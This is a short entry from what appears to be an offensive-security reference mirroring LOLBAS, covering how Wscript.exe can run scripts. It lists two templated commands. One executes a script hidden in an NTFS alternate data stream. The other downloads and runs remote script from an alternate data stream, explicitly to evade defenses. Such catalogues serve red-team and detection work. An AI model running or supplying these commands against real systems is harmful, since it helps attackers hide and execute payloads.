🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Wscript.exe

Wscript.exe

Used by Windows to execute scripts

ADS

Execute hidden code to evade defensive counter measures

wscript //e:vbscript {PATH}:script.vbs

Execute script stored in an alternate data stream — MITRE: T1564.004 — Privileges: User

Execute hidden code to evade defensive counter measures

echo GetObject("script:{REMOTEURL:.js}") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js

Download and execute script stored in an alternate data stream — MITRE: T1564.004 — Privileges: User